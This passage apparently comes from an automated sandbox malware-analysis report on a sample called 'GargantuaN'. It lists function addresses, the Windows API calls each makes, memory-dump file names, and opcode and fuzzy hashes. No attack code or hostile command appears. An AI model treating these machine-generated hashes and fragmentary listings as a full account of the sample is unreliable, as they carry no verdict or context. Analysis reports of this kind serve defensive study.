                                                        • Opcode Fuzzy Hash: 95dd0558ed3a995be87f110eb4115562451c7cdf9158b16db0fd10891576e30d
                                                        • Instruction Fuzzy Hash: 77A011EA2A8020BE300822A22C03C3B030CC0C0B22330A22EF80282080F880080808B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 384016d7d3606a94405f48b5897cc277a520b7f8e774d97a1e2a6a27d70f9b8b
                                                        • Instruction ID: 3404c67906004f8ab61e7f90c3964a15160b1f72c66a1c94867dda70a3dd903e
                                                        • Opcode Fuzzy Hash: 384016d7d3606a94405f48b5897cc277a520b7f8e774d97a1e2a6a27d70f9b8b
                                                        • Instruction Fuzzy Hash: 8DA011EA2A8002BE30082200AC03C3B030CC0C2F20330A82EF802C00C0F8800C0808B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D59F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetEndOfFile.KERNELBASE(?,00D5903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00D59F0C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File
                                                        • String ID:
                                                        • API String ID: 749574446-0
                                                        • Opcode ID: f14e387f2a8cf900f3438bff26e76ed79d7562fd71352a9f6e19a834965d207f
                                                        • Instruction ID: e4a417e534e2cc7a9734044c7ca63f5c49e8ad9ffc50e9a7b805d99d391f3322
                                                        • Opcode Fuzzy Hash: f14e387f2a8cf900f3438bff26e76ed79d7562fd71352a9f6e19a834965d207f
                                                        • Instruction Fuzzy Hash: A8A011300A020A8A8E002B30CA0800C3B20EB20BC032002A8A00ACA0A2CB22880B8B20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetCurrentDirectoryW.KERNELBASE(?,00D6AE72,C:\Users\user\AppData\Local\Temp,00000000,00D9946A,00000006), ref: 00D6AC08
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID:
                                                        • API String ID: 1611563598-0
                                                        • Opcode ID: e0154d84aef644fc8507bd0f16078253df08700a8c7c82b6e57a408c22318c15
                                                        • Instruction ID: f34233fb5fdd3453f061d68fc69d6d6fee2d7968efe9f9e3f4faa8c502a7f258
                                                        • Opcode Fuzzy Hash: e0154d84aef644fc8507bd0f16078253df08700a8c7c82b6e57a408c22318c15
                                                        • Instruction Fuzzy Hash: 33A011302003008B82000B328F0AA0FBAAAAFA2F00F00C028A008C0230CB38C820AA20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00D6C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D6C2B1
                                                        • EndDialog.USER32(?,00000006), ref: 00D6C2C4
                                                        • GetDlgItem.USER32(?,0000006C), ref: 00D6C2E0
                                                        • SetFocus.USER32(00000000), ref: 00D6C2E7
                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D6C321
                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D6C358
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00D6C36E
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D6C38C
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6C39C
                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D6C3B8
                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D6C3D4
                                                        • _swprintf.LIBCMT ref: 00D6C404
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D6C417
                                                        • FindClose.KERNEL32(00000000), ref: 00D6C41E
                                                        • _swprintf.LIBCMT ref: 00D6C477
                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D6C48A
                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D6C4A7
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D6C4C7
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6C4D7
                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D6C4F1
                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D6C509
                                                        • _swprintf.LIBCMT ref: 00D6C535
                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D6C548
                                                        • _swprintf.LIBCMT ref: 00D6C59C
                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D6C5AF
                                                          • Part of subcall function 00D6AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D6AF35
                                                          • Part of subcall function 00D6AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D8E72C,?,?), ref: 00D6AF84
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                        • API String ID: 797121971-1840816070
                                                        • Opcode ID: 6481c4a584cb4c0d78f68fe896ed050f8e6cbb94e8435d8f7ae55b0f027b2ac0
                                                        • Instruction ID: cd85c9d80e1d3feac193a5b595fa79a0865ff2ade09faf2d875b4be585c05c3a
                                                        • Opcode Fuzzy Hash: 6481c4a584cb4c0d78f68fe896ed050f8e6cbb94e8435d8f7ae55b0f027b2ac0
                                                        • Instruction Fuzzy Hash: 8E91B672158348BFD221DBA4DC49FFB77ACEB4AB40F044819FA89D6181D771E6088B72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D56FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D56FAA
                                                        • _wcslen.LIBCMT ref: 00D57013
                                                        • _wcslen.LIBCMT ref: 00D57084
                                                          • Part of subcall function 00D57A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57AAB
                                                          • Part of subcall function 00D57A9C: GetLastError.KERNEL32 ref: 00D57AF1
                                                          • Part of subcall function 00D57A9C: CloseHandle.KERNEL32(?), ref: 00D57B00
                                                          • Part of subcall function 00D5A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00D5977F,?,?,00D595CF,?,?,?,?,?,00D82641,000000FF), ref: 00D5A1F1
                                                          • Part of subcall function 00D5A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00D5977F,?,?,00D595CF,?,?,?,?,?,00D82641), ref: 00D5A21F
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00D57139
                                                        • CloseHandle.KERNEL32(00000000), ref: 00D57155
                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D57298
                                                          • Part of subcall function 00D59DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D573BC,?,?,?,00000000), ref: 00D59DBC
                                                          • Part of subcall function 00D59DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00D59E70
                                                          • Part of subcall function 00D59620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00D595D6,?,?,?,?,?,00D82641,000000FF), ref: 00D5963B
                                                          • Part of subcall function 00D5A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A501
                                                          • Part of subcall function 00D5A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A532
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                        • API String ID: 2821348736-3508440684
                                                        • Opcode ID: a5232a352dd8835401875334ab4abbb21e26fe9e4f4740aa5321211be5c31a0a
                                                        • Instruction ID: 57a05fc73a7793d7e244ff770976d450d3a1988a00ab27b735ee6c9d08661bfe
                                                        • Opcode Fuzzy Hash: a5232a352dd8835401875334ab4abbb21e26fe9e4f4740aa5321211be5c31a0a
                                                        • Instruction Fuzzy Hash: 3BC1A275904605AAEF21DB74DC42FEEB7B8EF04301F14455AFD5AE7282E730AA488B71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6F844
                                                        • IsDebuggerPresent.KERNEL32 ref: 00D6F910
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D6F930
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6F93A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                        • String ID:
                                                        • API String ID: 254469556-0
                                                        • Opcode ID: 3b20b2aa28e8ced556fcc33fd8fb09b540c12e464be3ff29f3746f28561c14ff
                                                        • Instruction ID: 9afb0d6b3cf3de58e3d4c02b37532d67a053a4648d7437111743792ac14e3b0a
                                                        • Opcode Fuzzy Hash: 3b20b2aa28e8ced556fcc33fd8fb09b540c12e464be3ff29f3746f28561c14ff
                                                        • Instruction Fuzzy Hash: 1F312975D05319ABDB20DFA4D9897CCBBB8AF08704F1040EAE40CAB250EB719B858F64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _swprintf.LIBCMT ref: 00D5E30E
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                          • Part of subcall function 00D61DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D91030,00000200,00D5D928,00000000,?,00000050,00D91030), ref: 00D61DC4
                                                        • _strlen.LIBCMT ref: 00D5E32F
                                                        • SetDlgItemTextW.USER32(?,00D8E274,?), ref: 00D5E38F
                                                        • GetWindowRect.USER32(?,?), ref: 00D5E3C9
                                                        • GetClientRect.USER32(?,?), ref: 00D5E3D5
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00D5E475
                                                        • GetWindowRect.USER32(?,?), ref: 00D5E4A2
                                                        • SetWindowTextW.USER32(?,?), ref: 00D5E4DB
                                                        • GetSystemMetrics.USER32(00000008), ref: 00D5E4E3
                                                        • GetWindow.USER32(?,00000005), ref: 00D5E4EE
                                                        • GetWindowRect.USER32(00000000,?), ref: 00D5E51B
                                                        • GetWindow.USER32(00000000,00000002), ref: 00D5E58D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                        • String ID: $%s:$CAPTION$d
                                                        • API String ID: 2407758923-2512411981
                                                        • Opcode ID: d0e6282cdf514506b54f70eb2bc345f8dc5e28fc9139d6b90980fa34e561d9ce
                                                        • Instruction ID: 375f3a218c19f0f92735b6b320c99022c4d5f160c403b4f4c943bc8234e762e9
                                                        • Opcode Fuzzy Hash: d0e6282cdf514506b54f70eb2bc345f8dc5e28fc9139d6b90980fa34e561d9ce
                                                        • Instruction Fuzzy Hash: 8F817071208301EFD714DFA8CD89A6BBBEDEB88705F04091DFE84D7250D671E9098B62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 00D7CB66
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C71E
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C730
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C742
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C754
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C766
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C778
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C78A
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C79C
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7AE
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7C0
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7D2
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7E4
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7F6
                                                        • _free.LIBCMT ref: 00D7CB5B
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D7CB7D
                                                        • _free.LIBCMT ref: 00D7CB92
                                                        • _free.LIBCMT ref: 00D7CB9D
                                                        • _free.LIBCMT ref: 00D7CBBF
                                                        • _free.LIBCMT ref: 00D7CBD2
                                                        • _free.LIBCMT ref: 00D7CBE0
                                                        • _free.LIBCMT ref: 00D7CBEB
                                                        • _free.LIBCMT ref: 00D7CC23
                                                        • _free.LIBCMT ref: 00D7CC2A
                                                        • _free.LIBCMT ref: 00D7CC47
                                                        • _free.LIBCMT ref: 00D7CC5F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: 6e46d100d08c5d218c27eb6e48073d7692accc72e08df999bc576140c37ad976
                                                        • Instruction ID: f6e8fdbb03cfab1d5f7adb5d9cb33efcac401b688cbaa1a47b4a9e7c5ff97d92
                                                        • Opcode Fuzzy Hash: 6e46d100d08c5d218c27eb6e48073d7692accc72e08df999bc576140c37ad976
                                                        • Instruction Fuzzy Hash: 8C3109316106059FEB31AA39D84AB5A77E9EF10320F18E42EF55DD6192EE71ED80DB30
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindow.USER32(?,00000005), ref: 00D6D6C1
                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 00D6D6ED
                                                          • Part of subcall function 00D61FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D5C116,00000000,.exe,?,?,00000800,?,?,?,00D68E3C), ref: 00D61FD1
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00D6D709
                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D6D720
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00D6D734
                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D6D75D
                                                        • DeleteObject.GDI32(00000000), ref: 00D6D764
                                                        • GetWindow.USER32(00000000,00000002), ref: 00D6D76D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                        • String ID: STATIC
                                                        • API String ID: 3820355801-1882779555
                                                        • Opcode ID: 65f3ccd2f85aa6283979209a3c7b0f3259f5d58c94b13d0d40bf021c2a5abf81
                                                        • Instruction ID: 8733a0a116e7ee4892a11aee6918ded12dad0f28645dd878e2178b4a4d0a7f64
                                                        • Opcode Fuzzy Hash: 65f3ccd2f85aa6283979209a3c7b0f3259f5d58c94b13d0d40bf021c2a5abf81
                                                        • Instruction Fuzzy Hash: 9F113632A40720FBE320BB74AC4AFAF765DEF00741F044220FA42E2191DB648F0556B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D796F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00D79705
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D79711
                                                        • _free.LIBCMT ref: 00D7971C
                                                        • _free.LIBCMT ref: 00D79727
                                                        • _free.LIBCMT ref: 00D79732
                                                        • _free.LIBCMT ref: 00D7973D
                                                        • _free.LIBCMT ref: 00D79748
                                                        • _free.LIBCMT ref: 00D79753
                                                        • _free.LIBCMT ref: 00D7975E
                                                        • _free.LIBCMT ref: 00D7976C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 9435c5709e14f1a42a1044a175eb747ad5d70df3d3523f7591520632abd0bf0b
                                                        • Instruction ID: bf25079c88a655303ce0302b54acb94ac1570c2652279e0a0e472c546b9ee8a4
                                                        • Opcode Fuzzy Hash: 9435c5709e14f1a42a1044a175eb747ad5d70df3d3523f7591520632abd0bf0b
                                                        • Instruction Fuzzy Hash: F511B976150109BFCB11EF54C946CDD3B75EF14360B51A4A2FA0C4F262EE31DE50ABA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D72E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
